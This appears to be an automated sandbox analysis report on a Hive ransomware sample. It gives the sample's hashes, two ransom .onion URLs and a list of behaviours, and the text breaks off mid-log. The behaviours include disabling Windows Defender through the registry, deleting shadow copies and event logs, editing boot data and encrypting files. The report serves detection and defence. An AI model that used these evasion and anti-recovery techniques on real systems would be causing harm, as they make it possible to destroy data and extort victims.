Analysis
-
max time kernel
119s -
max time network
185s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
05-01-2022 13:28
Static task
static1
Behavioral task
behavioral1
Sample
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
Resource
win7-en-20211208
General
-
Target
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe
-
Size
3.9MB
-
MD5
0e4d44dde522c07d09d9e3086cfae803
-
SHA1
d8dc26e2094869a0da78ecb47494c931419302dc
-
SHA256
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
-
SHA512
ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
Malware Config
Extracted
C:\Program Files\7-Zip\n8pw_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 3516 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 988 bcdedit.exe 568 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\GenericMailWideTile.scale-400.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalPipcDemoR_BypassTrial365-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_25.25.13009.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubLargeTile.scale-125_contrast-high.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.Awards\Assets\Sign_in_size.jpg 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Microsoft.Apps.People.BackgroundTasks.winmd 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdCO365R_SubTest-ul-oob.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_EAAAABAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Common AppData\Microsoft Help\MS.POWERPNT.16.1033.hxn.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_NAAAADQAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\ja\n8pw_HOW_TO_DECRYPT.txt 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\FPA_f4\FA000000005.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemePreview\CardBacks\Western.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-96.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\cstm_brand_preview2x.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nb-no\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\zh-tw\n8pw_HOW_TO_DECRYPT.txt 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_COL.HXT.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\pg_60x42.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\km_16x11.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-150_contrast-white.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Autumn\mask\13c.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\tool-search-2x.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Icon_Layout.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\n8pw_HOW_TO_DECRYPT.txt 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\News\news_bottom.jpg 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\GADUGI.TTF.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_IAAAACAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\6584_24x24x32.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\7989_20x20x32.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Google.scale-200.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-40.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\AugLoop\third-party-notices.txt.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\198.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\n8pw_HOW_TO_DECRYPT.txt 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_CAAAAAgAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\Pitchbook.potx.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_MgAAADIAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\heidy.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\SmallTile.scale-100.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sr-Cyrl-BA\msipc.dll.mui.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_PAAAADwAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\LTR\contrast-white\LargeTile.scale-125.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_2017.209.105.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-36_contrast-black.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Trial2-ppd.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_PAAAADwAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_COL.HXT.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\PeopleWideTile.scale-100.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\small\bf_16x11.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\xaml\onenote\CaptureUIStyles.xaml 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\8577_32x32x32.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarSplashLogo.scale-150.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\cross.png.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\GenericMailMediumTile.scale-400.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\ui-strings.js.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_GAAAABgAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\currency.data.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.scale-200.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\69.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-72_altform-colorize.png 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core_2.3.0.v20131211-1531.jar.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_OAAAADgAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AgAAAAIAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019VL_MAK_AE-pl.xrm-ms.x8vNMbnLUbRUA-z_kaN_MDITdfsZ3DyRI38LjVvHoyT_AAAAAAAAAAA0.cv2gj 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3180 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 3160 notepad.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exepid process 2820 powershell.exe 2820 powershell.exe 2820 powershell.exe 3904 powershell.exe 3904 powershell.exe 3904 powershell.exe 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3692 wevtutil.exe Token: SeBackupPrivilege 3692 wevtutil.exe Token: SeSecurityPrivilege 3580 wevtutil.exe Token: SeBackupPrivilege 3580 wevtutil.exe Token: SeSecurityPrivilege 1800 wevtutil.exe Token: SeBackupPrivilege 1800 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1480 wmic.exe Token: SeSecurityPrivilege 1480 wmic.exe Token: SeTakeOwnershipPrivilege 1480 wmic.exe Token: SeLoadDriverPrivilege 1480 wmic.exe Token: SeSystemProfilePrivilege 1480 wmic.exe Token: SeSystemtimePrivilege 1480 wmic.exe Token: SeProfSingleProcessPrivilege 1480 wmic.exe Token: SeIncBasePriorityPrivilege 1480 wmic.exe Token: SeCreatePagefilePrivilege 1480 wmic.exe Token: SeBackupPrivilege 1480 wmic.exe Token: SeRestorePrivilege 1480 wmic.exe Token: SeShutdownPrivilege 1480 wmic.exe Token: SeDebugPrivilege 1480 wmic.exe Token: SeSystemEnvironmentPrivilege 1480 wmic.exe Token: SeRemoteShutdownPrivilege 1480 wmic.exe Token: SeUndockPrivilege 1480 wmic.exe Token: SeManageVolumePrivilege 1480 wmic.exe Token: 33 1480 wmic.exe Token: 34 1480 wmic.exe Token: 35 1480 wmic.exe Token: 36 1480 wmic.exe Token: SeIncreaseQuotaPrivilege 3116 wmic.exe Token: SeSecurityPrivilege 3116 wmic.exe Token: SeTakeOwnershipPrivilege 3116 wmic.exe Token: SeLoadDriverPrivilege 3116 wmic.exe Token: SeSystemProfilePrivilege 3116 wmic.exe Token: SeSystemtimePrivilege 3116 wmic.exe Token: SeProfSingleProcessPrivilege 3116 wmic.exe Token: SeIncBasePriorityPrivilege 3116 wmic.exe Token: SeCreatePagefilePrivilege 3116 wmic.exe Token: SeBackupPrivilege 3116 wmic.exe Token: SeRestorePrivilege 3116 wmic.exe Token: SeShutdownPrivilege 3116 wmic.exe Token: SeDebugPrivilege 3116 wmic.exe Token: SeSystemEnvironmentPrivilege 3116 wmic.exe Token: SeRemoteShutdownPrivilege 3116 wmic.exe Token: SeUndockPrivilege 3116 wmic.exe Token: SeManageVolumePrivilege 3116 wmic.exe Token: 33 3116 wmic.exe Token: 34 3116 wmic.exe Token: 35 3116 wmic.exe Token: 36 3116 wmic.exe Token: SeIncreaseQuotaPrivilege 3116 wmic.exe Token: SeSecurityPrivilege 3116 wmic.exe Token: SeTakeOwnershipPrivilege 3116 wmic.exe Token: SeLoadDriverPrivilege 3116 wmic.exe Token: SeSystemProfilePrivilege 3116 wmic.exe Token: SeSystemtimePrivilege 3116 wmic.exe Token: SeProfSingleProcessPrivilege 3116 wmic.exe Token: SeIncBasePriorityPrivilege 3116 wmic.exe Token: SeCreatePagefilePrivilege 3116 wmic.exe Token: SeBackupPrivilege 3116 wmic.exe Token: SeRestorePrivilege 3116 wmic.exe Token: SeShutdownPrivilege 3116 wmic.exe Token: SeDebugPrivilege 3116 wmic.exe Token: SeSystemEnvironmentPrivilege 3116 wmic.exe Token: SeRemoteShutdownPrivilege 3116 wmic.exe Token: SeUndockPrivilege 3116 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 2512 wrote to memory of 3704 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 3704 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 3704 wrote to memory of 3280 3704 net.exe net1.exe PID 3704 wrote to memory of 3280 3704 net.exe net1.exe PID 2512 wrote to memory of 1524 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 1524 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1524 wrote to memory of 1296 1524 net.exe net1.exe PID 1524 wrote to memory of 1296 1524 net.exe net1.exe PID 2512 wrote to memory of 572 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 572 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 572 wrote to memory of 1164 572 net.exe net1.exe PID 572 wrote to memory of 1164 572 net.exe net1.exe PID 2512 wrote to memory of 2360 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 2360 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2360 wrote to memory of 2088 2360 net.exe net1.exe PID 2360 wrote to memory of 2088 2360 net.exe net1.exe PID 2512 wrote to memory of 2248 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 2248 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2248 wrote to memory of 3680 2248 net.exe net1.exe PID 2248 wrote to memory of 3680 2248 net.exe net1.exe PID 2512 wrote to memory of 3336 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 3336 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 3336 wrote to memory of 4036 3336 net.exe net1.exe PID 3336 wrote to memory of 4036 3336 net.exe net1.exe PID 2512 wrote to memory of 840 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 840 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 840 wrote to memory of 2572 840 net.exe net1.exe PID 840 wrote to memory of 2572 840 net.exe net1.exe PID 2512 wrote to memory of 1416 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 1416 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 1416 wrote to memory of 584 1416 net.exe net1.exe PID 1416 wrote to memory of 584 1416 net.exe net1.exe PID 2512 wrote to memory of 2528 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2512 wrote to memory of 2528 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe net.exe PID 2528 wrote to memory of 2552 2528 net.exe net1.exe PID 2528 wrote to memory of 2552 2528 net.exe net1.exe PID 2512 wrote to memory of 1668 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1668 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 2236 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 2236 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1320 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1320 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 wrote to memory of 1224 2512 33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277.exe sc.exe PID 2512 